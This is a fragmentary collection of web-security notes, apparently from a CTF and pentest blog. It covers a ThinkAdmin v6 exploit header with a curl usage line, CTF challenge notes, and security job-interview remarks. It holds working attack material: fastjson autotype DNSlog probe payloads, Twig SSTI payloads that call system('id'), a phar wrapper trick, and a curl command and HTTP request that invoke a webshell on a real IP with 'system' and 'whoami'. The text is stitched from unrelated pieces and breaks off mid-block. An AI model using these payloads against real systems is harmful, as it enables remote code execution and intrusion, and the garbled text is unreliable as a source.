Location: this is a deserialization entry point; a single gadget is enough for RCE.
Affected versions: depends on the JDK (jdk7u21), jython (), the underlying libraries (CommonsCollections) and the patch level. Other gadgets may also be usable.
```php
<?php
/*
 * Date: 2020-02-06
 * Exploit Author: k4ii
 * Daemon Link: https://v6.thinkadmin.top
 * Version: v6
 * Tested on: linux
 * Usage:
 * curl "https://v6.thinkadmin.top/admin/api.update/get" -d "encode=`php poc.php`"
```
# web 1
A simple exploitation challenge: knowing the CTFd account-takeover vulnerability is enough to solve it.
# web 2
The pseudocode is as follows:
```python
import os

# The challenge opens the flag file for reading
open("flag.txt", "r")

def shell():
    # This routine deletes the flag file
    os.system("rm flag.txt")
```
```go
package main

import (
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"os"
)
```
I had three interview opportunities:
Qi'anxin, Momo Security and Tencent.
Qi'anxin:
The questions roughly followed the penetration-testing workflow.
```
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
```
PHP:
```php
readfile("phar:///1.png/test.txt") == readfile("phaR:///1.png/test.txt")
```
TWIG SSTI:
```
{{["id"]|map("system")|join(",")
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
```
```php
<?php
/*
 *
 *
 * Attempt to bypass the AST analysis
 * Pass parameters via deserialization
 * Bypass via registering global variables
 * php://input
```
```shell
curl http://47.113.219.76/uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php --data "_=var_dump&__=system&___=whoami"
```
```http
POST /uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php HTTP/1.1
Host: 47.113.219.76
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
```